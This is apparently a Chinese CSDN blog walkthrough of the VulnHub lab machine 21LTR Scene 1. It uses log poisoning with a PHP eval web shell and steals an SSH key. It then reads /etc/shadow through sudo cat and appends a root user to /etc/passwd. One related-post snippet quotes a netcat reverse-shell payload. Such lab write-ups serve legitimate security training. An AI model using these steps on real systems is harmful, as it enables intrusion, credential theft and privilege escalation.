21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)

最新推荐文章于 2024-07-31 08:00:00 发布
最新推荐文章于 2024-07-31 08:00:00 发布
阅读量297 收藏 2
点赞数 4
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zdd1453691081/article/details/140806938
版权

信息收集:

靶机地址:https://www.vulnhub.com/entry/21ltr-scene-1,3/

(1)ip扫描

nmap 192.168.2.0/24

(2)端口扫描

nmap 192.168.2.120 -p- -A

(3)目录扫描(没发现什么有用的东西)

dirsearch -u  http://192.168.2.120

(4)访问页面,查看源码的时候发现了一个账号密码

getshell:

(1)尝试ssh连接没成功,但是ftp连接成功了

ftp  192.168.2.120

(2)ls查看,发现只有一个文件

(3)下载到本机查看

get backup_log.php /home/kali/Desktop/1.php
cat 1.php

(4)尝试拼接到刚才目录扫描的目录的logs目录下,发现可以访问到日志文件

http://192.168.2.120/logs/backup_log.php

(5)我们就可以尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口

telnet 192.168.2.120 10001

<?php @eval($_REQUEST['cmd']);?>

(6)蚁剑连接

提权:

(1)蚁剑连接后,可以查看一下敏感文件

(2)因为有ssh服务,就读取一下密钥

/media/USB_1/Stuff/Keys/id_rsa

(3)将文件保存到kali中

(4)赋予权限,然后ssh登录发现出错了,百度了一下这个解决办法

chmod 600 id_rsa

ssh -i id_rsa hbeale@192.168.2.120

(5)解决办法:

在~/.ssh目录下添加config
cd ~/.ssh
vim config

Host *
    HostKeyAlgorithms +ssh-rsa




要是有这个报错的话(sign_and_send_pubkey: no mutual signature supported)
将一下内容写入config
cd ~/.ssh
vim config
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config

(6)连接成功

(7)查看当前用户权限

sudo -l

(8)可以通过cat提权,所以可以看/etc/shadow文件,或者写入文件,选择读取shadow文件,破解密码

(9)然后将root用户的密码写入1.txt,然后开始破解,但是连接的时候,还是连接不上,应该是配置原因,那么只能写入高权限用户了

cd /usr/share/wordlists

vim 1.txt 

john --wordlist=rockyou.txt 1.txt

(10)命令生成密码

openssl passwd 123456

(11)然后依据/etc/passwd文件的格式写一个aroot用户

sudo /usr/bin/cat >> /etc/passwd
aroot:$1$J1DRKiec$c6CXi9UUFTMKwHS6lk3bI1:0:0:/root:/bin/bash

(12)提权成功

阿卡丽的神秘铺子
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 711
  练习环境     攻击机:kali     靶机21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机,端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
21LTR.com_Scene1_2.120_v1.0靶机
weixin_71232352的博客
07-30 172
1.查看mac地址并将kali添加一个仅主机模式并使用dhcp分配一个192.168.2.0网段网卡,将靶机设置成仅主机模式。13.kali监听并把网址后边id换成nc%20-e%20/bin/sh%20192.168.2.129%20443。11.在端口 10001 上启动了一个 netcat 话,我们得到了一个空白的 shell。6.发现登录凭证,尝试ssh连接发现失败,尝试ftp连接连接成功。查看/etc/passwd文件验证,发现确实存在hbeale用户。7.ls 发现有一个.php文件。
21LTR.com_Scene1_2.120_v1.0靶机复现
weixin_52956666的博客
07-31 198
查看/media/USB_1/Stuff/Keys下的id_rsa文件。将kali和虚拟机都设置为仅主机模式,网段都为192.168.2。使用telnet 192.168.2.120 10001连接。cd到ssh文件下,进行config文件编辑。ls查看有backup_log.php文件。ftp 192.168.2.120连接。密码:zg]E-b0]+8:(58G。输入账号密码发现连接失败。查看源码发现有账号密码。查看内容暂无有价值内容。读取etc/shdow。将文件保存到kali。发现root用户密码。
21LTR.com_Scene1_2.120靶机
2401_84564260的博客
07-30 485
创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd。su切换newuser用户。查看靶机的mac地址。
21LTR: Scene 1靶机
m0_61995767的博客
07-30 437
21LTR: Scene 1打靶记录
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 384
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 236
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
Vulnhub靶机 21 LTR-Scene1(渗透测试详细
2301_78721909的博客
07-30 311
Vulnhub靶机 21 LTR-Scene1详解(from wuhu)
21ltr-scene-1靶机
m0_65285254的博客
07-31 244
根据靶机描述,该靶机静态ip地址为192.168.2.120。因为之前扫描到ftp,ssh端口开放,使用该密码分别进行连接。ls查看文件,发现 backup_log.php 文件。利用/etc/passwd可写提权,写入用户到该文件中。访问/logs/backup_log.php 成功。按照格式将其echo到文件/etc/passwd中。扫描开放的全端口 开放21,22,80端口。当在网页上拼接访问logs时,访问被拒绝。将其下载到本地,在kali上查看内容。没发现什么功能点,对其进行目录扫描。
LTR.zip_ltr
09-24
标题 "LTR.zip_ltr" 暗示我们关注的焦点是一个与化学工程相关的计算程序,特别是关于液态回流(LTR)的算法。在石油炼制、化工生产等领域,蒸馏塔是重要的分离设备,而液态回流是蒸馏过程中优化效率的关键因素。这个...
LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A
07-15
标题中的“LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A”表明这是一个关于LTR-559ALS光感应器在STM32微控制器上的驱动程序和应用的资源包。关键词“年用量”可能指的是该传感器在特定...
LTR-578ALS-031WA_FINAL_DS_V1.0.pdf
04-07
The LTR-578ALS-031WA is an integrated low voltage I2C ambient light sensor (ALS), and proximity sensor (PS), with built-in emitter in a single miniature chipled lead-free surface mount package.
tcl.zip_Fish!?_fish_tcl fish_tcl程序_小程序
09-24
2. `i\icon-pdf-ltr.gif` 和 `i\icon-pdf-a4.gif` - 这些图标可能关联于PDF文件的显示,可能是在程序中表示不同方向(左到右`ltr`和可能的A4尺寸)的PDF文档。 3. `i\h-section.gif`, `i\xsection.gif`, `i\section....
l-sock.zip_linux socket_socket_socket linux_zip
09-14
例如,"i\dw-logo2.gif"可能是一个网站或文档的logo,"i\icon-pdf-ltr.gif"可能表示一个从左到右阅读的PDF文档图标。 综上所述,这个压缩包中的内容很可能详细阐述了如何在Linux环境中使用Socket API进行网络编程,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8357
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
chromedriver-mac-arm64_126.0.6465.0.zip
07-31
chromedriver-mac-arm64_126.0.6465.0.zip
chromedriver-mac-x64_122.0.6235.0.zip
最新发布
07-31
chromedriver-mac-x64_122.0.6235.0.zip
chromedriver-mac-x64_122.0.6188.0.zip
07-31
chromedriver-mac-x64_122.0.6188.0.zip
Ltr_retriever安装
07-14
要安装 Ltr_retriever,请按照以下步骤进行操作: 1. 首先,确保您的计算机上已经安装了 Python 3.6 或更高版本。您可以在命令行中运行以下命令来验证您的 Python 版本: ``` python --version ``` 2. 接下来,使用以下命令克隆 Ltr_retriever 仓库: ``` git clone https://github.com/codertimo/LTR-retriever.git ``` 3. 进入 Ltr_retriever 目录: ``` cd LTR-retriever ``` 4. 安装依赖项。您可以使用 pip 来安装所需的 Python 包: ``` pip install -r requirements.txt ``` 5. 安装 ElasticSearch。您可以根据您的操作系统和偏好,选择适合您的安装方法。可以在 ElasticSearch 官方网站上找到相应的安装指南。 6. 配置 ElasticSearch。在 `LTR-retriever/configs` 目录下,有一些示例配置文件可以供您参考。您可以根据您的需求进行相应的修改。 7. 运行 Ltr_retriever。您可以通过运行以下命令来启动 Ltr_retriever: ``` python main.py ``` 这样,您就成功安装了 Ltr_retriever。请注意,这只是一个简单的安装指南,具体的步骤可能根据您的操作系统和环境而有所不同。如有需要,请参考 Ltr_retriever 仓库中的文档和指南。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值